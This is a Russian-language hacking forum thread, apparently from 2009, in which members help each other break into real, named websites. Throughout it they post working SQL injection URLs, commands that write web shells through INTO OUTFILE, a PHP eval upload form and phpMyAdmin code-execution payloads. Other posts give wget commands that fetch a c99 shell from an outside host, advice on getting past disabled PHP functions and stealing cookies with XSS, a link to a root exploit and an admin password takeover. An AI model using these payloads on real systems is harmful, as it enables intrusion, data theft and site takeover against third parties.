Кстати,sudo команда доступна...Забыл добавить,что админка - Siteman2
Там ещё фильтруются двойные кавычки,посему пришлось извращаться через селект и лить свой убогий шелл).Оттуда и выполняю команды теперь.
Хм..попробовал:
echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php
Чет не канает...
А <? ... ?> кто напишет?
И что именно не канает? это расплывчатое понятие.
1) не загружается файл (естественно, в файле не скрипт а белиберда)
2) не пишется в сам файл
3) не могу форму сделать для загрузки файла
4) написал чушь, 9.php')" > /var/www/htdocs/write/9.php
schwarze
24.11.2009, 18:14
Есть Windows сервер с XAMPP (MySQL 5.03, phpMyAdmin 2.11.4).
Уязвимых скриптов не нашел, страницы - полуголая статика. Обратил внимание на пхпМайАдмин, порылся на ачате - нашел уязвимость, нормального описания ее найти не смог, как использовать тоже.
Кто может объяснить более подробно как использовать уязвимость или дать ссылку, где можно почитать.
P.S. я про server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
тебе нужен валидный токен,т.е надо валидный логин пасс на пхп админ.
порты проскань,можешь найдешь что нить
_http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+union+select+1--&template_set=default
Чет не хочет крутиться дальше ).вывода нету,ascii тож не заюзать...
мор1ров заюзай
http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(substring(version(),1,1)=5,1,(select+1 +union+select+2))
_http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+union+select+1--&template_set=default
Чет не хочет крутиться дальше ).вывода нету,ascii тож не заюзать...
blind в demo_3.php
http://www.astangukool.edu.ee/rus/poll/db/demo_3.php?poll_id=4+and+substring(version(),1,1)= 5-- http://www.astangukool.edu.ee/rus/poll/db/misc/info.php
Что так,что эдак - ничего не достать)
Все прекрасно достается
http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(ascii(substring((select+table_name+fro m+information_schema.columns+where+column_name+lik e+0x257061737325+limit+0,1),1,1))>5,1,(select+1+union+select+2))
Читай статью https://forum.antichat.ru/thread35207.html
Что так,что эдак - ничего не достать)
да да Advanced Poll 2.02 :D
например http://milw0rm.com/exploits/3282
Ммм...без ифа никак не обойтись ? Длинная статья...в SIPT-е я так понял так не получится)Тогда чем перебирать ?
Ммм...без ифа никак не обойтись ? Длинная статья...в SIPT-е я так понял так не получится)Тогда чем перебирать ?
Грей писал скрипт для работы со слепыми инжектами :)
http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}
mailbrush
24.11.2009, 23:52
А which тебе что покажет, если его нет? :D
т.е. результат which which и which curl будет разный, если самого which нету? =\
З.Ы. Модеры, сорри
Если which нету, значит результат будет пустой, поэтому он не покажет есть ли качалки или их нет...
']http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}
http://securityvulns.com/Odocument594.html :(
http://[target]/poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd=Http://EvilShell
(с) alguidy[at]hotmail[.]com
1. Объясните мне, все таки возможно отрубить конец названии файла нулл байтом при:
Content-Type: multipart/form-data
Если да то как это сделать? Правильно ли я это делаю
(этим -> %00 -> не получится отрубить естественно конец при multipart/form-data):
...
filename="thistest.php\x00.jpg"
...
второй вариант который пробывал:
...
filename="thistest.php\0.jpg"
...
2. Если выше перечисл. примеров отрубания конца нулл байтом работают при:
Content-Type: multipart/form-data
То как быть если часть названия файла до бек слеша ("\")
отрубается и считается директорией? Можно ли это обойти и все таки отрубить конец при:
Content-Type: multipart/form-data
Заранее спасибо за ответы
подскажите раскручиваемо??
http://www.wearhouse.ru/?page=item&id=125'
???
Раскручивается,SELECT нельзя использовать,используй подзапросы
направьте на путь истинный или пример подзапроса
http://www.wearhouse.ru/?page=item&id=125+and+ascii(substring((select+table_name+from +information_schema.tables+limit+0,1),1,1))>1
свеб агрится на юнион =)
Ded MustD!e
26.11.2009, 02:08
Раскручивается,SELECT нельзя использовать,используй подзапросы
херня, в подзапросах используется select, и дело тут не только в селекте.
подскажите раскручиваемо??
http://www.wearhouse.ru/?page=item&id=125'
???
http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--+
Duplicate column name '5.0.26-lk-log'
Каким образом догнать до этого?
софт?
опыт?
SIPT мне не помог(
DrAssault
26.11.2009, 05:21
Каким образом догнать до этого?
софт?
опыт?
SIPT мне не помог(
Опыт + анализ :(
Опыт + анализ :(
я так понимаю чтобы дернуть таблицы из informatiob schema надо будес с подазпросами мутить?
Каким образом догнать до этого?
софт?
опыт?
SIPT мне не помог(
http://sql-ex.ru/help/
я так понимаю чтобы дернуть таблицы из informatiob schema надо будес с подазпросами мутить?
http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1),14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+
Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html
http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1),14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+
Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html
понятно..всем спасибо, будем пополнять багаж знаний
Nightmarе
26.11.2009, 17:27
Помогите разобраться со SQL:
http://www.webpizza.ru/order.php
параметр add=1' в котором SQL передаётся этому скрипту POST запросом.
Вывод ошибки есть, но не вывести на экран ничего сделать не могу вообще, даже банальный сценарий "union select 1" не пашет ни в каких вариация, какой бы комент я не ставил в конце, и что бы я не добавлял в самое начало, он просто выводит запросы на экран и всё...
Кто сможет, подскажите как тут можно вывести инфу на экран и если ветка пятая то как вывести инфу в ошибку в данном случае.
там 4.1, и скорее всего не один запрос (например ещё update=> в результате пролетает union)
можешь раскручивать как more1row (+order by if(...))
jecka3000
26.11.2009, 18:38
как залить шелл имея доступ в админку. Есть ли универсальный способ заливки, т.е не зная на чем сайт работает,заливать. Какой сейчас лучше всего юзать для дампа большого количества юзеров из БД?
mailbrush
26.11.2009, 20:31
как залить шелл имея доступ в админку. Есть ли универсальный способ заливки, т.е не зная на чем сайт работает,заливать.
Нет. Для каждого самописного двига - свой подход, и не факт.
Какой сейчас лучше всего юзать для дампа большого количества юзеров из БД?
Google.com -> MySQL Dumper
jecka3000
26.11.2009, 20:59
mailbrush, с шеллами понятно, а вот на счет дамперов. Впринципе я раньше юзал SQLHelper, но последнее время он перестал дампить большие БД юзеров или пропускает очень много, к тому же не воспринимает некоторые символы. Есть ли ему альтернатива? Или может быть есть какя то софтина,наподобие той функции, которая есть в SQLHelper ("Dump now").
П.С. Хотел найти не пхп скрипт, а именно exe
mailbrush, с шеллами понятно, а вот на счет дамперов. Впринципе я раньше юзал SQLHelper, но последнее время он перестал дампить большие БД юзеров или пропускает очень много, к тому же не воспринимает некоторые символы. Есть ли ему альтернатива? Или может быть есть какя то софтина,наподобие той функции, которая есть в SQLHelper ("Dump now").
П.С. Хотел найти не пхп скрипт, а именно exe
ня http://c0li.wordpress.com/2009/10/04/simple-sqli-dumper-ssdp-v0-1-gui/
мне нрявится :(
jecka3000
26.11.2009, 21:30
LzD, все равно большую базу сдампить не может(
302:301) No data. Operation halted !!!
LzD, все равно большую базу сдампить не может(
pangolin пробуй
jecka3000
26.11.2009, 21:58
LzD, походу у меня вариант остался только руками)))
Как лучше всего спрятаться в системе с рут правами? (кроме протроянивания SSH, изменений php файлов web среды)
http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1),14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+
Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html
тут как я понял name_const
для этого дела заюзал
https://forum.antichat.ru/thread148915.html
помогло.результат был получен.
Спасибо Pashkela
вообщем нашёл скулю в одном сайте но вот до админки никак не добраться
собственно вопрос куда дальше идти?и как действовать,новичёк в этом деле
http://www.tltinfo.ru/index.php?id=3999+and+0+union+select+0,1,2,3,conca t_ws(char(58),user(),version(),database()),5,6,7,8 ,9,10,11/*
Админка тут: http://www.tltinfo.ru/admin.php
http://sucuri.net/?page=docs&title=webapp-version-detection
Есть поиск юзеров на сайте знакомств, поиск по нику, если задать, допустим "Ната", то выведет всех юзеров, чьи имена начинаются на "Ната", а если задать пустое значение, то не чего не выводит скрипт, а если поставить символ "%", то выводит обсалютно всех озеров, т.е. там вродебы идёт сравнивание оператором LIKE.
Возможно ли как нибуть провести SQL-inj?
Есть поиск юзеров на сайте знакомств, поиск по нику, если задать, допустим "Ната", то выведет всех юзеров, чьи имена начинаются на "Ната", а если задать пустое значение, то не чего не выводит скрипт, а если поставить символ "%", то выводит обсалютно всех озеров, т.е. там вродебы идёт сравнивание оператором LIKE.
Возможно ли как нибуть провести SQL-inj?
Это не форум телепатов, давайте ссылку если хотите что бы вас вопрос не игнорировали.
Totgeliebt
28.11.2009, 03:00
Подскажите плз браузер в который легко подставлять куки
Подскажите плз браузер в который легко подставлять куки
Firefox...тебе нужна сборка FireFox Portable Edition
Там есть такой,как Tamper Data.В нём нажимаешь Запустить перехват,то плагин сам не вырубаешь.Делаешь гет/пост/куки/иной неебический запрос,после чего управляешь процессом...(перехватываешь ,прерываешь запросы или не вмешиваешься в работу).
т.е. там вродебы идёт сравнивание оператором LIKE.
Возможно ли как нибуть провести SQL-inj?
Вроде бы ? Что-то не догнал такую схему...Или сплю уже.Другие символы не выдают того же ?
Totgeliebt
28.11.2009, 04:07
а в оперу можно подсатвить как-нибудь чужие куки?
BlackSun
28.11.2009, 05:08
Открыть сорец страницы нужного сайта, дописать
<script>document.cookie="тут куки";</script> и нажать применить, затем просто обновить страницу.
В ФФ - установить плагин "Web developer"
Открыть сорец страницы нужного сайта, дописать
<script>document.cookie="тут куки";</script> и нажать применить, затем просто обновить страницу.
ну ты изврашенец)) в опере кукисы можно спойкойно в настройках менять Настройки - Настройки для сайта - Cookies
Что это за хеш такой вот типа такого *F5DA2E1958D3C417483729021A647BC97877E5F8 кто подскажет
это mysql, *F5DA2E1958D3C417483729021A647BC97877E5F8 => asu
В PasswordsPro есть список алгоритмов хэширования.+онлайн сервис есть..ща поищу.
А хэши по виду определяются..или по специфическим отличиям,как длина символов или группа символов там,здесь...
Strilo4ka,по второму вопросу - Это не раскрутишь - ошибка java.Во всяком случае,мне так ответили.
ЗЫ: Ошибка,связанная не с базой в общем.
BlackSun
28.11.2009, 05:38
ну ты изврашенец)) в опере кукисы можно спойкойно в настройках менять Настройки - Настройки для сайта - Cookies
А если надо добавить куку? ...
Totgeliebt
28.11.2009, 05:39
http://forum.antichat.ru/thread159668.html прочитайте плз
Да плагинов для работы с кукисами и прог кот наплакал..
Как видноэто ошибка в сценарии жава.Что там крутить непонятно.
Totgeliebt
28.11.2009, 10:52
Вот нашла я Активную XSS на форуме, позаходила чужими акками :) а можно еще что-нибудь интересное сделать с ее помощью? это форум сервера по л2, можно ли через форум и Активную XSS на нем взломать базу данных?
ну достать куки администратора, там возможно в них пароль будет содержатся и получиш контроль над админкой
2Strilo4ka
как по мне сайт нормально защищен (он очень простой, там практически ничего нет)
Pashkela
28.11.2009, 14:34
2 Strilo4ka:
Там просто креш на сайте, ты же забил просто фамилию в строке поиска? Так вот, твоя ссылка ничем не отличается от такой:
http://www.phones.mk.ua/?fio=123
и от любой другой фамилии. Чо ты там словить хочешь?
где обычно лежат пароли к фтп? линукс
Ded MustD!e
28.11.2009, 18:48
http://holms.ukrnet.net/
Здесь есть что нибуть!?
ты, наверное, удивишься, но там есть сайт.
Выдержка из правил раздела:
НЕ разрешается: просьбы о взломе, реклама, просьбы о поиске багов.
Нашел скул на MSSQL Jet подобрал количество полей
http://localhost/script.aspx?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17+from+articles#
брутил таблицу и некоторых нашел, но чтоб брутит колонок и взят инфо принтабелных полей не выводит:
Server Error in '/' Application. String was not recognized as a valid DateTime. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.FormatException: String was not recognized as a valid DateTime. Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below. Stack Trace: [FormatException: String was not recognized as a valid DateTime.] System.DateTimeParse.Parse(String s, DateTimeFormatInfo dtfi, DateTimeStyles styles) +2835862 System.Convert.ToDateTime(String value, IFormatProvider provider) +72 System.String.System.IConvertible.ToDateTime(IForm atProvider provider) +10 System.Data.Common.DateTimeStorage.Set(Int32 record, Object value) +74 System.Data.DataColumn.set_Item(Int32 record, Object value) +51 [ArgumentException: String was not recognized as a valid DateTime.Couldn't store <14> in adate Column. Expected type is DateTime.] System.Data.DataColumn.set_Item(Int32 record, Object value) +90 System.Data.DataTable.NewRecordFromArray(Object[] value) +227 System.Data.DataTable.LoadDataRow(Object[] values, Boolean fAcceptChanges) +82 System.Data.ProviderBase.SchemaMapping.LoadDataRow () +83 System.Data.Common.DataAdapter.FillLoadDataRow(Sch emaMapping mapping) +91 System.Data.Common.DataAdapter.FillFromReader(Data Set dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +164 System.Data.Common.DataAdapter.Fill(DataSet dataSet, String srcTable, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +353 System.Data.Common.DbDataAdapter.FillInternal(Data Set dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +164 System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +287 System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, String srcTable) +92 newswire.viewarticle.Page_Load(Object sender, EventArgs e) +180 System.Web.UI.Control.OnLoad(EventArgs e) +99 System.Web.UI.Control.LoadRecursive() +50 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
Возможно ли как нибудь взят имена колонок?
такой вопрос а как лучше искать уязвимости :
искать дыры в известных движках а потом загугливать сайты на этих двигах или есть спец софт который сканирует сайты и выводит сайты с возможными багами?
если очень надо взломат тот или иной ресурс, надо юзат сканеры тоже но и самому искать в движке ресурса баг. Часто сканеры пропускають дыри
[Google Source Code: Поиск багов в исходниках.]
Представлены ссылки для поиска бажного кода.
[1]- GoogleCodeSearch
[2]- GoogleSearch
http://cipher.org.uk/ideas/bugle/
Юзаем , ищем баги, хекоем :D
а сканеры какие можете посоветовать?
а сканеры какие можете посоветовать?
http://sectools.org/web-scanners.html
PS Acunetix весьма не плох
drakstart
29.11.2009, 01:45
уже писал раз но тема куда-то пропала(
вообщем вопрос
есть сайт где форма регистрации проверяет уникальность имени
так вот такие запросы
?username=vasja' or '1'='1
?username=vasja' or 1=1
?username=vasja' or '1'='1'
приводят к ошыбке 403
если же запрос писать так
?username=vasja' or '1'='2
?username=vasja' or 1=2
?username=vasja' or '1'='2'
то просто выдает сообщение что неверное имя
, я так понимаю єто потенцыальная инекция, только не могу понять почему она проходит и с кавычками и без
Как такое может быть?
Nightmarе
29.11.2009, 02:09
Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
<form action="shell.php?lol=copy($_FILES[file][tmp_name], $_GET);&bob=./shell.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>
[Google Source Code: Поиск багов в исходниках.]
Представлены ссылки для поиска бажного кода.
[1]- GoogleCodeSearch
[2]- GoogleSearch
http://cipher.org.uk/ideas/bugle/
Юзаем , ищем баги, хекоем :D
В этом проекте и наш [B]ettee участвовал :)
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:
$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.
надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
nemaniak
29.11.2009, 22:15
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:
$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.
надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
eliteload
29.11.2009, 22:31
disable_functions
rmdir, exec, unlink, shell_exec, escapeshellcmd, system, passthru, pcntl_exec, chmod, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate
возможно ли выполнять системные команды, с такой конфигурацией php.ini? если да, то как?
mailbrush
29.11.2009, 22:41
Попробуй <?=`ls`?>
но не факт, т.к. это аналог shell_exec, вроде...
DimOnOID
29.11.2009, 22:44
Попробуй <?=`ls`?>
но не факт, т.к. это аналог shell_exec, вроде
именно.
Поэтому попробуй заюзать popen.
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:
$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.
надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
http://www.insidepro.com/hashes.php?lang=rus --> MD5(Wordpress)
Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
спс уже нашел вот http://onlinefunctions.net/wordpress-hash-generator.html
Подскажите, может кто-то видел эксплоит на
uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
DimOnOID
30.11.2009, 12:06
Подскажите, может кто-то видел эксплоит на
uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
http://milw0rm.com/exploits/9479
p.r0phe.t
30.11.2009, 18:23
Сори,что тут пишу, вопрос в один ответ. подскажите плз файл-сервер с прямой ссылкой на закачаный мной файл.
давно хотел спросить... и вот наконец решился) вообщем ситуация такая....
сервак работает под рутом!
залил с помощю into outfile в /tmp/freek8.php сстроку такого содержания-->
<? php system($_GET[cmd]); ?>
http://www.motorama.be/show.php?id=-117+union+select+1,2,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,4,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+mysql.user+into+outfile+'/tmp/freek8.php'/*
потом проверил записалось ли...
http://www.motorama.be/show.php?id=-117+union+select+1,2,load_file('/tmp/freek8.php'),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
но теперь то што дальше? я так понимаю надо раскрыть полный путь к файлу /tmp/freek8.php
какие есть способы?
вообщем подсказуйте хто што знает)
p.r0phe.t
30.11.2009, 18:47
давно хотел спросить... и вот наконец решился) вообщем ситуация такая....
сервак работает под рутом!
залил с помощю into outfile в /tmp/freek8.php сстроку такого содержания-->
<? php system($_GET[cmd]); ?>
http://www.motorama.be/show.php?id=-117+union+select+1,2,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,4,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+mysql.user+into+outfile+'/tmp/freek8.php'/*
но теперь то што дальше? я так понимаю надо раскрыть полный путь к файлу /tmp/freek8.php
какие есть способы?
вообщем подсказуйте хто што знает)
Что значит сервак работает под рутом? у веб сервера id=0? Сомневаюсь... Отсюда вопрос:
а права web сервера пустят тебя в эту папку?
Найди путь к сайту и залей шелл туда.
Права у базы - рут,насколько я понял - это не рут системы...
p.r0phe.t
30.11.2009, 19:05
хммм... может ты и прав...
но раз я залил шел в папку tmp то можно попробовать выполнить код?
надо только выяснить полный путь к директории..
это и есть полный путь к директории.
Найди в скриптах сайта ошибку,которая выдаст путь к директории сайта,либо через тот же лоадфайл перебором, и лей шелл туда. Как от веб сервера обратиться к папке темп сам бы послушал,если такое возможно. Думаю функцией include,которую опять же нужно найти.
1 http://madnet.name/tools/madss/
2 http://cacpe.be/index.php?page[]=
3 http://motorama.be/yaneshell.php
$ uname -a
Linux motorama.be 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux
mailbrush
30.11.2009, 21:46
блин...
да несовсем в танке на самом деле... коешто понимаю... ну скулю то я найшел.
я просто непойму как он вообще выполнил там скрипт шелла?
to l1ght
и раз турки его уже прибрали может можно раскрыть карты?
Он же расписал все по пунктам.
1. Юзаем тулзу от меднета http://madnet.name/tools/madss/, которая сканит сайт.
2. Видим там это, http://cacpe.be/index.php?page[]=, то есть раскрытие путей.
3. Льем шелл не в папку /tmp, а папку, которую показало нам раскрытие, и которая доступна из веба, то есть
Warning: Illegal offset type in isset or empty in /var/www/html/index.php on line 118
_______
А, ну да, madss показывает соседей + директории)
_______
Либо у меня руки кривые, либо он через sock_sendpage() не рутается)
_______
Да нет, все таки у меня руки кривые, ибо кто-то уже чмод 777 / -R выполнил)
wget -O /papka/na/servere/shell.php http://shell.in/shell.txt
DimOnOID
01.12.2009, 00:52
wget -o /papka/na/servere/shell.php http://shell.in/shell.txt
wget -O
Регист важен.
wget -o /papka/na/servere/shell.php http://shell.in/shell.txt
Сразу видно ты команду ниразу не юзал:
wget http://ya.ru/index.html -o 1.txt - поместит лог работы в 1.txt
wget http://ya.ru/index.html -O 1.txt - сохранит файл в 1.txt
Сразу видно ты команду ниразу не юзал:
wget http://ya.ru/index.html -o 1.txt - поместит лог работы в 1.txt
wget http://ya.ru/index.html -O 1.txt - сохранит файл в 1.txt
правильно?
wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php
где www.motorama.be/shell.php сайт куда надо загрузить шелл...
а wget http://site.ru/shell.txt
сайт где лежит код шелла...
правильно?
wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php
где www.motorama.be/shell.php сайт куда надо загрузить шелл...
а wget http://site.ru/shell.txt
сайт где лежит код шелла...
неправильно.
для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
- определяет что за веб-сервер установлен
- ищет его конфиги
- находит в конфигах полный путь к директории сервера
- вычисляет куда, наконец, сохранить этот злополучный shell.php
- сохраняет его туда
Вам не кажется что это многовато для простой утилиты?
mailbrush
01.12.2009, 01:39
неправильно.
для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
- определяет что за веб-сервер установлен
- ищет его конфиги
- находит в конфигах полный путь к директории сервера
- вычисляет куда, наконец, сохранить этот злополучный shell.php
- сохраняет его туда
Вам не кажется что это многовато для простой утилиты?
Мда уж... И зачем умничать? Это по-детски как-то. Честно, как ребенок говоришь...
547, я тебе уже в личке объяснял, еще раз напишу полный и рабочий пример использования wget
wget http://madnet.name/files/download/9_c99madshell.php -O c99madshell.php
В даном случае wget скачает файл, который находится по адресу http://madnet.name/files/download/9_c99madshell.php в файл c99madshell.php, который будет находится в текущей директории, т.е. в директории с которой был запущен wget. Если необходимо загрузить в отличную от текущей директорию, достаточно вместо c99madshell.php написать полный путь к файлу, н.п.
/var/www/images/smiles/smile.php
А вообще, читай
http://linux.about.com/od/commands/l/blcmdl1_wget.htm
p.r0phe.t
01.12.2009, 13:50
Подскажите файлохранлище с ПРЯМОЙ ссылкой на файл.
Для меня лучший обменник - filehoster.Ru.
а так советую зарегать хост к примеру на юкозе, и туда лить файлы
p.r0phe.t
01.12.2009, 14:03
Для меня лучший обменник - filehoster.Ru.
а так советую зарегать хост к примеру на юкозе, и туда лить файлы
мне нужно чтобы wget'ом качнуть потом можно было,прямая ссылка как я написал,без всяких подтверждений
Pashkela
01.12.2009, 14:14
регить сайт на народе - 1 мин.
Здравствуйте.
1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6--
Как можно залить шелл?
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
p.r0phe.t
01.12.2009, 15:10
Здравствуйте.
1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6--
Как можно залить шелл?
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
кавычки экранируются. Облом с аутфайлом в общем.
Можешь хеш расшифровать к юзеру рут =)
root:C705FA72189D628A3657C885B0668778976F72E4
кавычки экранируются. Да и file_priv=n помоему. Облом с аутфайлом в общем.
Можешь хеш расшифровать к юзеру рут =)
root:C705FA72189D628A3657C885B0668778976F72E4
спс, а сам запрос верно написал?
Totgeliebt
01.12.2009, 15:20
что можно с этим сделать?
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 3699224 bytes) in /home/gamer/public_html/messages.php on line 411
что можно с этим сделать?
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 3699224 bytes) in /home/gamer/public_html/messages.php on line 411
Ну теперь ты знаеш полный путь.
А это переполнение разрешенной памяти вроде :(
p.r0phe.t
01.12.2009, 15:21
регить сайт на народе - 1 мин.
на народе помоему капчу ввели для скачивания.
Totgeliebt
01.12.2009, 15:28
Ну теперь ты знаеш полный путь.
А это переполнение разрешенной памяти вроде :(
а для чего это может пригодится? :D
а для чего это может пригодится? :D
Полный путь,например для заливки шела через sql-inj.
скуля, это конечно хорошо, но не запароленный пма под рутом гораздо юзабильнее
(без пробелов)
terratour.ru/ru/shell.system.eval.select.backconnect.root.hacker.e xploit.findme.download.free.porn.c99.wso2.2009.JpG .pHp
Спасибо, если можно разъясните что такое пма, или ссылку дайте.
root@localhost
file_priv Y
into outfile & load_file рабаотает...
но когда даю такой запрос пишет:
Ошибка в параметрах запроса
http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*
но какая тут ошибка? путь найшол вроде все правильно в tmp записывалось нормально....
может отсутствуют права на запись в директорию сайта?
HAXTA4OK
01.12.2009, 16:23
скуля, это конечно хорошо, но не запароленный пма под рутом гораздо юзабильнее
http://terratour.ru/ru/turkhackteam.php
а ну эти линки на шеллы, через 5-30 секунд умирают)
я не вкурил какие линки на шеллы? О_о у меня до сих пор все живое))уже как 1 час гдето
PSSSS самое прикольное что там RFI\LFI по сути))))тока там отключенно удаленное(забыл как она называется, сбудуна просто сижу, экз сдал :D )
в 3.4.6 колонках если 0xhex вставить то инклудь что хочеш на нем, тока есть косяка / поэтому в 3 колонке hex путей а в 4 уже hex файла ))
http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,0x443a5c7777775c7275,0x70616765 732e706870,5,6
p.r0phe.t
01.12.2009, 16:26
root@localhost
file_priv Y
into outfile & load_file рабаотает...
но когда даю такой запрос пишет:
Ошибка в параметрах запроса
http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*
но какая тут ошибка? путь найшол вроде все правильно в tmp записывалось нормально....
может отсутствуют права на запись в директорию сайта?
http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*
уматно сайт спрятал =))
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot